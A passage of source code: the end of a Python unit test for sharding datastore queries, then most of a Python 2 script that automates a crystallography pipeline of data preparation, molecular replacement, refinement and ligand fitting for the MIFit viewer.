"entity_kind": self.entity_kind,
"namespace": "f",
"filters": [("a", ">", 0), ("a", "<=", 3), ("b", "=", 1)]
}
conf = map_job.JobConfig(
job_name=self.TEST_JOB_NAME,
mapper=map_job.Mapper,
input_reader_cls=self.reader_cls,
input_reader_params=params,
shard_count=100)
results = conf.input_reader_cls.split_input(conf)
self.assertEquals(3, len(results))
self._assertEquals_splitInput(results[0], [])
self._assertEquals_splitInput(results[1], [])
self._assertEquals_splitInput(results[2], [])
def testSplitInput_shardByFilters_bigShardNumber(self):
entities = self._create_entities(range(12), {}, "f")
self._set_vals(entities, list(range(6)), list(range(2)))
params = {
"entity_kind": self.entity_kind,
"namespace": "f",
"filters": [("a", ">", 0), ("a", "<=", 3), ("b", "=", 1)]
}
conf = map_job.JobConfig(
job_name=self.TEST_JOB_NAME,
mapper=map_job.Mapper,
input_reader_cls=self.reader_cls,
input_reader_params=params,
shard_count=100)
results = conf.input_reader_cls.split_input(conf)
self.assertEquals(3, len(results))
self._assertEquals_splitInput(results[0], ["3"])
self._assertEquals_splitInput(results[1], ["5"])
self._assertEquals_splitInput(results[2], ["7"])
def testSplitInput_shardByFilters_lotsOfNS(self):
"""Lots means more than 2 in test cases."""
entities = self._create_entities(range(12), {}, "f")
self._set_vals(entities, list(range(6)), list(range(2)))
entities = self._create_entities(range(12, 24), {}, "g")
self._set_vals(entities, list(range(6)), list(range(2)))
entities = self._create_entities(range(24, 36), {}, "h")
self._set_vals(entities, list(range(6)), list(range(2)))
entities = self._create_entities(range(36, 48), {}, "h")
self._set_vals(entities, [0]*6, list(range(2)))
params = {
"entity_kind": self.entity_kind,
"filters": [("a", ">", 0), ("a", "<=", 3), ("b", "=", 1)]
}
conf = map_job.JobConfig(
job_name=self.TEST_JOB_NAME,
mapper=map_job.Mapper,
input_reader_cls=self.reader_cls,
input_reader_params=params,
shard_count=100)
results = conf.input_reader_cls.split_input(conf)
self.assertEquals(3, len(results))
self._assertEquals_splitInput(results[0], ["3", "5", "7"])
self._assertEquals_splitInput(results[1], ["15", "17", "19"])
self._assertEquals_splitInput(results[2], ["27", "29", "31"])
class ModelNDBDatastoreInputReaderTest(datastore_input_reader_base_test
.DatastoreInputReaderBaseTest):
"""Test ModelDatastoreInputReader using Model.ndb."""
@property
def reader_cls(self):
return model_datastore_input_reader.ModelDatastoreInputReader
@property
def entity_kind(self):
return testutil.NDB_ENTITY_KIND
def _create_entities(self,
keys_itr,
key_to_scatter_val,
ns=None,
entity_model_cls=testutil.NdbTestEntity):
"""Create ndb entities for tests.
Args:
keys_itr: an iterator that contains all the key names.
        Will be cast to str.
key_to_scatter_val: a dict that maps key names to its scatter values.
ns: the namespace to create the entity at.
entity_model_cls: entity model class.
Returns:
A list of entities created.
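    Example (usage sketch, mirroring the calls in the tests above):
      entities = self._create_entities(range(12), {}, "f")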
"""
testutil.set_scatter_setter(key_to_scatter_val)
entities = []
for i in keys_itr:
k = ndb.Key(entity_model_cls._get_kind(), str(i), namespace=ns)
entity = entity_model_cls(key=k)
entities.append(entity)
entity.put()
return entities
def _get_keyname(self, entity):
return entity.key.id()
if __name__ == "__main__":
unittest.main()
|
apache-2.0
|
mifit/miexpert
|
mi_bng.py
|
1
|
55765
|
######################################################################
# #
# Runs 'bind-n-grind' automation including refinement data #
# preparation, MR, refinement, rigid-ligand fitting and MIFit launch #
# #
# Copyright: Molecular Images 2005 #
# #
# This script is distributed under the same conditions as MIFit #
# #
######################################################################
import sys
import os
import time
import string
import dircache
import getopt
import ccp4check
def Usage():
print "Usage: %s [options]" % sys.argv[0]
print "Options are:"
print " --hklin=FILE Data file (option may be repeated)"
print " --workdir=DIR Working dir (option may be repeated)"
print " --spacegroup_no=NUM The spacegroup number to use"
    print " --reference_mtz=FILE Reference mtz data file. Default: no file"
print " --pdbin=FILE The input coordinate file."
print " --multi_search=yes or no Try all pdb files in pdbin's directory? Default: no"
print " --libfile The input library file. Default: no file"
print " --fragfit=FILE The fragfit file. Default: no file"
print " --chemfit=FILE The chemistry structure file. Default: no file"
print " --frag_center=\"x y z\" Center of the fragment. Default: none"
print " --mlwfile=FILE Input session file for viewpoint. Default: none"
print " --pdbviewfile=FILE Input PDB marker file for viewpoint. Default: none"
print " --mifit=yes or no Launch mifit when done. Default: no"
print " --bngsummary=DIR Path for bng summary html file. Default: no dir, do not produce"
print " --sg_search=yes or no Do a spacegroup search. Default: no"
print " --molimagehome=DIR Path to MIFit."
print " --writemap=yes or no Write map around target point. Default: no"
print " --detector_constants=FILE Detector constants file. Default: no file"
print " --process_engine=type Default: mosflm"
print " -?,--help This help."
print ""
print "Note:"
print " The number of hklin options should equal the number of workingdir options"
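# Illustrative invocation (a hypothetical sketch; every file name and path below is a placeholder):
#   python mi_bng.py --hklin=/data/xtal1.mtz --workdir=/data/run1 --pdbin=/models/apo.pdb \
#       --frag_center="12.0 8.5 -3.2" --fragfit=/models/ligand.pdb --bngsummary=/data/summaries --mifit=no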
def Run(argv=None):
if argv is None:
argv=sys.argv
# Initialization and defaults
integrate = 'mi_runintegrate.txt'
dataprep = 'mi_rundataprep.txt'
molrep = 'mi_runmr.txt'
refine = 'mi_runrefine.txt'
inputfile = 'mi_runbng.txt'
mifit_root = 'none'
symlibinstall = 'none'
mlw_file = 'bng_milaunch.mlw'
phs_file = 'bng_mlmap.phs'
bngsummaryname = 'bng_jobsummary_1.htm'
bngsummaryroot = 'bng_jobsummary_'
hklin = 'none'
workingdir = 'none'
spacegroup_no = 'none'
referencemtz = 'none'
pdbin = 'none'
multi_search = 'no'
libfile = 'none'
fragfile = 'none'
chemfile = 'none'
fragcenter = 'none'
mlwfilein = 'none'
pdbviewfile = 'none'
launch_mifit = 'no'
bngsummary = 'none'
pdbfileout = 'none'
sg_search = 'no'
write_map = 'no'
detector_constants = 'none'
mr_sg = 'none'
mr_sg_best = 'none'
process_engine = 'mosflm'
fragview = '1.0000 0.0000 0.0000 0.0000 1.0000 0.0000 0.0000 0.0000 1.0000'
zoom = '30.00'
frontclip = '3.00'
backclip = '-3.00'
contourradius = '12.000000'
aList_contourlevels1 = []
aList_contourleveldefault1 = []
aList_contourcolor1 = []
aList_color1 = []
aList_contourlevels2 = []
aList_contourleveldefault2 = []
aList_contourcolor2 = []
aList_color2 = []
first_map = 'no'
second_map = 'no'
border = 10.0
water_radius = 15.0
water_radius = water_radius * water_radius
aList = []
aList_hklin = []
aList_workingdir = []
aList_dir = []
aList_sg = []
quote = """'"""
# parse args
number_of_args = len(argv)
args = argv[1:]
optlist, args = getopt.getopt(
args,'?',
['hklin=','workdir=','spacegroup_no=','reference_mtz=',
'pdbin=','multi_search=','libfile=','fragfit=','chemfit=',
'frag_center=','mlwfile=','pdbviewfile=','mifit=','bngsummary=',
'sg_search=','molimagehome=','writemap=',
'detector_constants=','process_engine=','help'])
number_of_inputs = len(optlist)
if number_of_inputs==0:
Usage()
return
count = 0
while count < number_of_inputs:
aList = optlist[count]
number_of_list_inputs = len(aList)
if number_of_list_inputs >=1:
arg_value = aList[0]
if arg_value == '-?' or arg_value=='--help':
Usage()
return
if number_of_list_inputs >=2:
param_value = aList[1]
if arg_value=='--hklin':
hklin = param_value
aList_hklin.append(hklin)
if arg_value=='--workdir':
workingdir = param_value
aList_workingdir.append(workingdir)
if arg_value=='--spacegroup_no':
spacegroup_no = param_value
if arg_value=='--reference_mtz':
referencemtz = param_value
if arg_value=='--pdbin':
pdbin = param_value
if arg_value=='--multi_search':
multi_search = param_value
if arg_value=='--libfile':
libfile = param_value
if arg_value=='--fragfit':
fragfile = param_value
if arg_value=='--chemfit':
chemfile = param_value
if arg_value=='--frag_center':
fragcenter = param_value
if arg_value=='--mlwfile':
mlwfilein = param_value
if arg_value=='--pdbviewfile':
pdbviewfile = param_value
if arg_value=='--mifit':
launch_mifit = param_value
if arg_value=='--bngsummary':
bngsummary = param_value
if arg_value=='--sg_search':
sg_search = param_value
if arg_value=='--molimagehome':
mifit_root = param_value
if arg_value=='--writemap':
write_map = param_value
if arg_value=='--detector_constants':
detector_constants = param_value
if arg_value=='--process_engine':
process_engine = param_value
count=count+1
ccp4,error = ccp4check.ccp4check()
if not ccp4:
print '\n' + error + '\n'
time.sleep(4)
return 1
# Capture initial CCP4 scratch space because subscripts may reset it
ccp4_scratch = os.environ['CCP4_SCR']
# Check MIFit installation to access various files (default and direct path)
if mifit_root == 'none':
print '\nMIFit root directory was not given\n'
time.sleep(4)
return 1
if not os.path.exists(mifit_root):
print '\nMIFit root directory was not found\n'
time.sleep(4)
return 1
# Set paths to MIFit executable and symmetry library
mifit_root_data = os.path.join(mifit_root,'data')
symlibinstall = os.path.join(mifit_root_data,'symlib')
test_platform = sys.platform
if test_platform.find('win') > -1:
mifitinstall = os.path.join(mifit_root,'MIFit.exe')
else:
mifitinstall = os.path.join(mifit_root,'MIFit')
if not os.path.exists(symlibinstall):
print '\nThe MI symmetry library was not located\n'
time.sleep(4)
return 1
# Check paired datasets/working directories
number_datasets = len(aList_hklin)
number_workingdirs = len(aList_workingdir)
if number_datasets != number_workingdirs and number_workingdirs != 0:
print '\nThe number of working directories must equal the number of datasets - stopping !\n'
time.sleep(4)
return 1
runcount = 0
while runcount < number_datasets:
hklin = aList_hklin[runcount]
if not os.path.exists(hklin):
time.sleep(4)
print '\nAn input data file was not found',hklin,'\n'
time.sleep(4)
return 1
runcount = runcount + 1
runcount = 0
while runcount < number_workingdirs:
workingdir = aList_workingdir[runcount]
if not os.path.exists(workingdir):
time.sleep(4)
print '\nAn input working directory file was not found',workingdir,'\n'
time.sleep(4)
return 1
runcount = runcount + 1
# Check all common input file paths
if not os.path.exists(pdbin):
print '\nThe input coordinate file was not found\n'
time.sleep(4)
return 1
if not os.path.exists(libfile) and os.path.basename(libfile) != 'none':
print '\nThe input library file was not found\n'
time.sleep(4)
return 1
if not os.path.exists(referencemtz) and os.path.basename(referencemtz) != 'none':
print '\nThe input reference data file was not found\n'
time.sleep(4)
return 1
if not os.path.exists(fragfile) and os.path.basename(fragfile) != 'none':
print '\nThe input fragment coordinate file was not found\n'
time.sleep(4)
return 1
if not os.path.exists(chemfile) and os.path.basename(chemfile) != 'none':
print '\nThe input chemistry structure file was not found\n'
time.sleep(4)
return 1
if not os.path.exists(mlwfilein) and os.path.basename(mlwfilein) != 'none':
print '\nThe input session file was not found\n'
time.sleep(4)
return 1
if not os.path.exists(bngsummary) and os.path.basename(bngsummary) != 'none':
print '\nThe directory for the BNG job summary was not found\n'
time.sleep(4)
return 1
# Check the image processing engine parameter is recognized
if process_engine != 'none' and process_engine != 'mosflm':
print '\nThe image processing engine must be set to one of none/mosflm'
time.sleep(4)
return 1
# Check and obtain fragment/view center
if fragcenter != 'none':
aList = fragcenter.split()
number_args = len(aList)
if number_args != 3:
print '\nThe fragment center must be three numbers for x,y,z\n'
time.sleep(4)
return 1
else:
x_center = aList[0]
y_center = aList[1]
z_center = aList[2]
x_center = float(x_center)
y_center = float(y_center)
z_center = float(z_center)
    # Or parse the view point from the first coordinate in the PDB marker file (ATOM/HETATM record)
if pdbviewfile != 'none':
file = open(pdbviewfile,'r')
allLines = file.readlines()
file.close()
found_marker = 'no'
for eachLine in allLines:
tag = eachLine[0:6]
tag = tag.strip()
if tag == 'ATOM' or tag == 'HETATM':
if found_marker == 'no':
x_center = eachLine[30:38]
y_center = eachLine[38:46]
z_center = eachLine[46:54]
fragcenter = x_center + ' ' + y_center + ' ' + z_center
x_center = float(x_center)
y_center = float(y_center)
z_center = float(z_center)
found_marker = 'yes'
##########################################
# Parse view definitions from mlw file #
##########################################
if mlwfilein != 'none':
file = open(mlwfilein,'r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
# Get view point
if eachLine.find('translation') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args == 4:
x_center = aLine[1]
y_center = aLine[2]
z_center = aLine[3]
fragcenter = x_center + ' ' + y_center + ' ' + z_center
x_center = float(x_center)
y_center = float(y_center)
z_center = float(z_center)
if eachLine.find('rotation') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args == 10:
fragview = aLine[1] + ' ' + aLine[2] + ' ' + aLine[3] + ' ' \
+ aLine[4] + ' ' + aLine[5] + ' ' + aLine[6] + ' ' \
+ aLine[7] + ' ' + aLine[8] + ' ' + aLine[9]
if eachLine.find('zoom') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args == 2:
zoom = aLine[1]
if eachLine.find('frontclip') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args == 2:
frontclip = aLine[1]
if eachLine.find('backclip') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args == 2:
backclip = aLine[1]
if eachLine.find('contourradius') > -1:
aLine = eachLine.split()
number_args = len(aLine)
if number_args == 2:
contourradius = aLine[1]
            # Get colors and contours
if eachLine.find('maptocont 1') > -1:
first_map = 'yes'
if eachLine.find('maptocont 2') > -1:
second_map = 'yes'
if second_map == 'no':
if eachLine.find('contourlevels') > -1:
aList = eachLine.split()
aList_contourlevels1.append(aList[1])
if eachLine.find('contourleveldefault') > -1:
aLine = eachLine[19:100]
aLine = aLine.strip()
aList_contourleveldefault1.append(aLine)
if eachLine.find('contourcolor') > -1:
aList = eachLine.split()
aList_contourcolor1.append(aList[1])
if eachLine.find('color') > -1:
aList = eachLine.split()
if aList[0] == 'color':
aList_color1.append(aList[1])
if second_map == 'yes':
if eachLine.find('contourlevels') > -1:
aList = eachLine.split()
aList_contourlevels2.append(aList[1])
if eachLine.find('contourleveldefault') > -1:
aLine = eachLine[19:100]
aLine = aLine.strip()
aList_contourleveldefault2.append(aLine)
if eachLine.find('contourcolor') > -1:
aList = eachLine.split()
aList_contourcolor2.append(aList[1])
if eachLine.find('color') > -1:
aList = eachLine.split()
if aList[0] == 'color':
aList_color2.append(aList[1])
# Check that for fragment input a center is also given
if fragfile != 'none' and fragcenter == 'none':
print '\nA fragment center must be available if a ligand file is given\n'
time.sleep(4)
return 1
##############################
# Prepare summary HTML file #
##############################
file_tag_max = 0
if os.path.basename(bngsummary) != 'none':
bngsummaryfile = os.path.join(bngsummary,bngsummaryname)
# If file already exists increment name
if os.path.exists(bngsummaryfile):
aList_dir = os.listdir(bngsummary)
number_files = len(aList_dir)
count = 0
while count < number_files:
test_file = aList_dir[count]
if test_file.find(bngsummaryroot) > -1:
aList = test_file.split('_')
number_args = len(aList)
if number_args > 2:
file_tag = aList[2]
file_tag = file_tag.replace('.htm','')
if file_tag.isdigit() == 1:
file_tag = int(file_tag)
if file_tag > file_tag_max:
file_tag_max = file_tag
count = count + 1
file_tag_max = int(file_tag_max)
file_tag_max = file_tag_max + 1
file_tag_max = str(file_tag_max)
bngsummaryname = bngsummaryroot + file_tag_max + '.htm'
bngsummaryfile = os.path.join(bngsummary,bngsummaryname)
print '\nRUN SUMMARY DATA LOG:',bngsummaryfile
runtime = time.ctime(time.time())
# HTML header
filename = bngsummaryfile
file = open(filename,'w')
file.write('<html>\n')
file.write('<head><title>BNG Run Summary</title></head>\n')
file.write('<body bgcolor = "white">\n')
file.write('<h2><center>BNG Run Summary</center></h2>\n')
file.write('<p>\n')
file.write('<b>Job start: ')
file.write(runtime)
file.write('</b>\n')
file.write('<p>\n')
file.write('<table border=1>\n')
file.write('<tr>\n')
file.write('<tr bgcolor = "yellow">\n')
file.write('<td>History</td>')
file.write('<td>Res. (Å)</td>')
file.write('<td>R<sub>work</sub></td>')
file.write('<td>R<sub>free</sub></td>')
file.write('<td>Error List</td>')
file.write('<td>Working Directory</td>')
file.write('</tr>\n')
file.write('<tr>\n')
file.close()
######################################################
# Loop over multiple dataset/working directory pairs #
######################################################
runcount = 0
while runcount < number_datasets:
list_runcount = runcount + 1
list_runcount = str(list_runcount)
print '\nSTARTING BNG PROCESS ON DATASET',list_runcount
print '\nUsing MIFit installation:',mifit_root
image_data_processed = 'yes'
hklin = aList_hklin[runcount]
# Default working directory path is dataset location
if number_workingdirs == 0:
workingdir = os.path.dirname(hklin)
else:
workingdir = aList_workingdir[runcount]
dir_list = os.listdir(workingdir)
number_files = len(dir_list)
os.chdir(workingdir)
##############################################################
# Data processing option (invoked via image file extensions) #
##############################################################
if hklin.find('.img') > -1 or hklin.find('.osc') > -1:
print '\nDATA PROCESSING'
image_data_processed = 'no'
# Check space group is set
if spacegroup_no == 'none':
print '\nThe space group number must be given for image data processing\n'
time.sleep(4)
return 1
# Establish a working directory (BNG) for merged data file and structure solution process
bng_workingdir = os.path.join(workingdir,'BNG')
if not os.path.exists(bng_workingdir):
os.mkdir(bng_workingdir)
# set args for image data processing
tmpargs=[]
tmpargs.append("integrate")
tmpargs.append("--template_image")
tmpargs.append(hklin)
tmpargs.append("--spacegroup")
tmpargs.append(spacegroup_no)
tmpargs.append('--workdir')
tmpargs.append(bng_workingdir)
if detector_constants != 'none':
tmpargs.append('--detector_constants')
tmpargs.append(detector_constants)
# Execute image data processing
if process_engine == 'mosflm':
import mi_integrate
if mi_integrate.Run(tmpargs)!=0:
runcount = runcount + 1
continue
hklin = os.path.join(bng_workingdir,'ScalAverage_1.mtz')
# Check image data processing succeeded
if not os.path.exists(hklin):
                print '\nImage integration failed\n'
time.sleep(4)
runcount = runcount + 1
continue
else:
workingdir = bng_workingdir
image_data_processed = 'yes'
######################
# Structure Solution #
######################
if image_data_processed == 'yes':
################
# Data import #
################
print '\nDATA SETUP'
# set args
tmpargs=[]
tmpargs.append("dataprep")
tmpargs.append('--hklin')
tmpargs.append(hklin)
tmpargs.append('--workdir')
tmpargs.append(workingdir)
tmpargs.append('--spacegroup')
tmpargs.append(spacegroup_no)
tmpargs.append('--reference_mtz')
tmpargs.append(referencemtz)
# Execute
import mi_dataprep
if mi_dataprep.Run(tmpargs)!=0:
runcount = runcount + 1
continue # try next dataset
############
# Run MR #
############
print '\nMR CALCULATIONS'
# Select mtz file name from the last data setup job and check space group
file = open('project_history.txt','r')
allLines = file.readlines()
file.close()
read_mtz_name = 'no'
mtzout = 'none'
spacegroup_check = 'none'
for eachLine in allLines:
if eachLine.find('Job ID:') > -1 and eachLine.find('dataprep_') > -1:
read_mtz_name = 'yes'
if read_mtz_name == 'yes' and eachLine.find('Output mtz data:') > -1:
mtzout = eachLine[16:200]
mtzout = mtzout.strip()
mtzout_full=mtzout
read_mtz_name = 'no'
if eachLine.find('Space group number:') > -1:
spacegroup_check = eachLine[19:100]
spacegroup_check = spacegroup_check.strip()
if mtzout == 'none':
print '\nThere is no mtz file to use for MR !\n'
time.sleep(4)
return 1
# Check user options are possible given space group indexing possibilities and available reference data
permutable = 'no'
if spacegroup_check == '75' or spacegroup_check == '76' or spacegroup_check == '77' or spacegroup_check == '78' \
or spacegroup_check == '79' or spacegroup_check == '80' or spacegroup_check == '143' or spacegroup_check == '144' \
or spacegroup_check == '145' or spacegroup_check == '146' or spacegroup_check == '149' \
or spacegroup_check == '151' or spacegroup_check == '153' or spacegroup_check == '150' or spacegroup_check == '152' \
or spacegroup_check == '154' or spacegroup_check == '155' or spacegroup_check == '168' or spacegroup_check == '169' \
or spacegroup_check == '170' or spacegroup_check == '171' or spacegroup_check == '172' or spacegroup_check == '173' \
or spacegroup_check == '195' or spacegroup_check == '196' or spacegroup_check == '197' or spacegroup_check == '198' \
or spacegroup_check == '199':
permutable = 'yes'
if permutable == 'yes' and referencemtz == 'none':
print '\nWarning: this space group is reindexable!'
print 'A reference data set is needed for target site water exclusion, ligand-fitting, molecule repositioning\n'
mlwfilein = 'none'
fragcenter = 'none'
fragfile = 'none'
# Write run file
tmpargs=[]
tmpargs.append("molrep")
tmpargs.append('--pdbfile')
tmpargs.append(pdbin)
tmpargs.append('--mtzfile')
tmpargs.append(mtzout)
tmpargs.append('--fixed_pdb')
tmpargs.append('none')
tmpargs.append('--workdir')
tmpargs.append(workingdir)
tmpargs.append('--multi_search')
tmpargs.append(multi_search)
tmpargs.append('--match_pdbin')
if permutable == 'yes' and referencemtz == 'none':
tmpargs.append('no')
else:
tmpargs.append('yes')
tmpargs.append('--sg_search')
if sg_search == 'yes':
tmpargs.append('yes')
else:
tmpargs.append('no')
# Execute
import mi_molrep
if mi_molrep.Run(tmpargs)!=0:
runcount = runcount + 1
continue # try next dataset
os.environ['CCP4_SCR'] = ccp4_scratch
##########################
# Run initial refinement #
##########################
print '\nPRELIMINARY REFINEMENT'
read_r = 'no'
aList_pdb = []
aList_rvalue = []
pdbin_best_full = 'none'
pdbfile = 'none'
# Select the best coordinate file from the project log
file = open('project_history.txt','r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
if eachLine.find('Job ID:') > -1 and eachLine.find('molrep_') > -1:
read_r = 'yes'
if eachLine.find('Output atoms:') > -1 and eachLine.find('molrep_') > -1 and read_r=='yes':
pdbfile = eachLine[14:]
pdbfile = pdbfile.strip()
aList_pdb.append(pdbfile)
if eachLine.find('MR space group:') > -1 and read_r == 'yes':
aList = eachLine.split(':')
mr_sg = aList[1]
aList_sg.append(mr_sg.strip())
if eachLine.find('Summary:') > -1 and read_r == 'yes':
aList = eachLine.split(':')
rvalue = aList[1]
rvalue = rvalue.replace('R=','')
aList_rvalue.append(rvalue)
read_r = 'no'
number_models = len(aList_rvalue)
rvalue_best = 999.00
if number_models == 0:
print '\nThere is no MR model to refine !\n'
time.sleep(4)
return 1
count = 0
while count < number_models:
rvalue = aList_rvalue[count]
if rvalue.isalpha() == 1:
print '\nMR R-value in history file is not a number - value is:',rvalue,'\n'
time.sleep(4)
return 1
else:
rvalue = float(rvalue)
if rvalue < rvalue_best:
pdbin_best = aList_pdb[count]
rvalue_best = rvalue
mr_sg_best = aList_sg[count]
count = count + 1
pdbin_best_full = pdbin_best.strip()
if rvalue_best > 0.65:
print '\nMR R-value is too high - stopping !\n'
time.sleep(4)
return 1
# Change the space group number in the data file if space group search option was invoked
if sg_search == 'yes':
if os.path.exists('mi_temp_sg_new.mtz'):
os.remove('mi_temp_sg_new.mtz')
file = open(mtzout_full,'rb')
allLines = file.readlines()
file.close()
file = open('mi_temp_sg.mtz','wb')
file.writelines(allLines)
file.close()
filename_inp = 'mi_cad_sg.inp'
filename_log = 'mi_cad_sg.log'
file = open(filename_inp,'w')
file.write('LABIN FILE_NUMBER 1 ALL\n')
file.write('SYMMETRY ')
file.write(mr_sg_best)
file.write('\n')
file.write('SORT H K L \n')
file.write('END\n')
file.close()
runcad = 'cad HKLIN1 mi_temp_sg.mtz HKLOUT mi_temp_sg_new.mtz < ' + filename_inp + ' > ' + filename_log
os.system(runcad)
if os.path.exists('mi_temp_sg_new.mtz'):
os.remove(filename_inp)
os.remove(filename_log)
os.remove('mi_temp_sg.mtz')
os.remove(mtzout_full)
os.rename('mi_temp_sg_new.mtz',mtzout_full)
# Write run file
tmpargs=[]
tmpargs.append("refine")
tmpargs.append('--pdbfile')
tmpargs.append(pdbin_best_full)
tmpargs.append('--mtzfile')
tmpargs.append(mtzout_full)
tmpargs.append('--workdir')
tmpargs.append(workingdir)
tmpargs.append('--libfile')
tmpargs.append(libfile)
tmpargs.append('--engine')
tmpargs.append('refmac5')
tmpargs.append('--weight')
tmpargs.append('0.1')
tmpargs.append('--max_res')
tmpargs.append('none')
tmpargs.append('--bref_type')
tmpargs.append('none')
tmpargs.append('--cycles')
tmpargs.append('5')
tmpargs.append('--water_cycles')
tmpargs.append('0')
tmpargs.append('--mifithome')
tmpargs.append(mifit_root)
# Execute
import mi_refine
if mi_refine.Run(tmpargs)!=0:
runcount = runcount + 1
continue # try next dataset
os.environ['CCP4_SCR'] = ccp4_scratch
#####################################
# Run refinement with water-picking #
#####################################
print '\nEXTENDED REFINEMENT'
# Select last coordinate file to continue refinement
pdbfile = 'none'
file = open('project_history.txt','r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
if eachLine.find('Output atoms:') > -1:
pdbfile = eachLine[13:200]
pdbfile = pdbfile.strip()
if pdbfile == 'none':
print '\nPDB file for extended refinement was not found !\n'
time.sleep(4)
return 1
# Write run args
tmpargs=[]
tmpargs.append("refine")
tmpargs.append('--pdbfile')
tmpargs.append(pdbfile)
tmpargs.append('--mtzfile')
tmpargs.append(mtzout_full)
tmpargs.append('--workdir')
tmpargs.append(workingdir)
tmpargs.append('--libfile')
tmpargs.append(libfile)
tmpargs.append('--engine')
tmpargs.append('refmac5')
tmpargs.append('--weight')
tmpargs.append('0.1')
tmpargs.append('--max_res')
tmpargs.append('none')
tmpargs.append('--bref_type')
tmpargs.append('none')
tmpargs.append('--cycles')
tmpargs.append('5')
tmpargs.append('--water_cycles')
tmpargs.append('3')
tmpargs.append('--mifithome')
tmpargs.append(mifit_root)
# Execute
import mi_refine
if mi_refine.Run(tmpargs)!=0:
runcount = runcount + 1
continue # try next dataset
os.environ['CCP4_SCR'] = ccp4_scratch
#############################################################
# Run water deletion from target site if viewpoint was set #
#############################################################
if fragcenter != 'none':
print '\nRECOMPUTING MODEL AND MAP DATA WITH TARGET SITE WATERS REMOVED'
# Find coordinates and delete waters
pdbfile = 'none'
file = open('project_history.txt','r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
if eachLine.find('Output atoms:') > -1:
pdbfile = eachLine[13:200]
pdbfile = pdbfile.strip()
if pdbfile == 'none':
print '\nPDB file for omit map calculations was not found !\n'
time.sleep(4)
return 1
file = open(pdbfile,'r')
allLines = file.readlines()
file.close()
pdbfile_omit = pdbfile.replace('.pdb','_omit.pdb')
file = open(pdbfile_omit,'w')
for eachLine in allLines:
tag = eachLine[0:6]
tag = tag.strip()
write_record = 'yes'
if tag == 'ATOM' or tag == 'HETATM':
if eachLine.find('HOH') > -1:
x = eachLine[30:38]
y = eachLine[38:46]
z = eachLine[46:54]
x = float(x)
y = float(y)
z = float(z)
dist = (x_center - x) ** 2 + (y_center - y)**2 + (z_center - z)** 2
if dist < water_radius:
write_record = 'no'
if write_record == 'yes':
file.write(eachLine)
file.close()
# Recalculate map data without target waters
# Write run args
tmpargs=[]
tmpargs.append("refine")
tmpargs.append('--pdbfile')
tmpargs.append(pdbfile_omit)
tmpargs.append('--mtzfile')
tmpargs.append(mtzout_full)
tmpargs.append('--workdir')
tmpargs.append(workingdir)
tmpargs.append('--libfile')
tmpargs.append(libfile)
tmpargs.append('--engine')
tmpargs.append('refmac5')
tmpargs.append('--weight')
tmpargs.append('0.1')
tmpargs.append('--max_res')
tmpargs.append('none')
tmpargs.append('--bref_type')
tmpargs.append('none')
tmpargs.append('--cycles')
tmpargs.append('0')
tmpargs.append('--water_cycles')
tmpargs.append('0')
tmpargs.append('--mifithome')
tmpargs.append(mifit_root)
import mi_refine
if mi_refine.Run(tmpargs)!=0:
runcount = runcount + 1
continue # try next dataset
os.environ['CCP4_SCR'] = ccp4_scratch
###############################################################
# Automated ligand-fitting subscripts may be invoked here #
###############################################################
# Example script for this option uses FFFEAR to perform 6D search with a single i/p ligand conformation
if fragcenter != 'none' and fragfile != 'none':
print '\nRIGID-BODY LIGAND FITTING'
print 'This option uses the example script: mi_ligandfit.py'
# Obtain paths to the last coordinate file and last data file
file = open('project_history.txt','r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
if eachLine.find('Output atoms:') > -1:
pdbfile = eachLine[13:200]
pdbfile = pdbfile.strip()
if eachLine.find('Output phased data:') > -1:
mtzout = eachLine[19:200]
mtzout = mtzout.strip()
if pdbfile == 'none':
print '\nPDB file for rigid-body ligand fitting was not found\n'
time.sleep(4)
return 1
if mtzout == 'none':
print '\nMTZ file for rigid-body ligand fitting was not found\n'
time.sleep(4)
return 1
# Set output name for protein with ligand
pdbfileout = pdbfile.replace('.pdb','_ligand.pdb')
############################################################################
# Run the ligand-fitting routine #
# Ligand-fitting routines usually need: #
# pdbfile = the path to current protein model #
# mtzout = the path to phased diffraction data from REFMAC #
# workingdir = the path to the working directory #
# fragcenter = approx x,y,z coordinates for ligand #
# fragfile = the path to an input 3D model of ligand #
# pdbfileout = the path to o/p coordinates of protein with fitted ligand #
############################################################################
tmpargs=[]
tmpargs.append("ligandfit")
tmpargs.append('-f')
tmpargs.append(fragfile)
tmpargs.append('-m')
tmpargs.append(mtzout)
tmpargs.append('-p')
tmpargs.append(pdbfile)
tmpargs.append('-c')
tmpargs.append(fragcenter)
tmpargs.append('-d')
tmpargs.append(workingdir)
tmpargs.append('-o')
tmpargs.append(pdbfileout)
import mi_ligandfit
mi_ligandfit.Run(tmpargs)
            # User may supply a script/technology here, with inputs patterned on the rigid-body example
if fragcenter != 'none' and chemfile != 'none':
print '\nFLEXIBLE LIGAND FITTING'
print 'This option requires a user-supplied script to be called from mi_bng.py'
#########################################################
# Setup crystal and data files for interactive graphics #
#########################################################
pdbfile = 'none'
mtzout = 'none'
print '\nFILE CREATION FOR MIFIT'
print 'View center:',fragcenter
# Obtain paths to the last coordinate file and last data file
file = open('project_history.txt','r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
if eachLine.find('Output atoms:') > -1:
pdbfile = eachLine[13:200]
pdbfile = pdbfile.strip()
if eachLine.find('Output phased data:') > -1:
mtzout = eachLine[19:200]
mtzout = mtzout.strip()
if pdbfile == 'none':
print '\nPDB file for session file was not found\n'
time.sleep(4)
return 1
if mtzout == 'none':
print '\nMTZ file for session file was not found\n'
time.sleep(4)
return 1
# Replace pdb file to version with ligand if automated-ligand fitting was done
if fragcenter != 'none' and fragfile != 'none' and pdbfileout != 'none':
fileexists = os.path.exists(pdbfileout)
if fileexists != 0:
pdbfile = pdbfileout
# Need local paths
pdbfile_local = os.path.basename(pdbfile)
mtzout_local = os.path.basename(mtzout)
#
# Write a minimal session (mlw) file to launch the display
#
# Obtain a model center for translation keyword if no fragment center was given
if fragcenter == 'none':
xmean = 0.0
ymean = 0.0
zmean = 0.0
number_atoms = 0.0
file = open(pdbfile,'r')
allLines = file.readlines()
file.close()
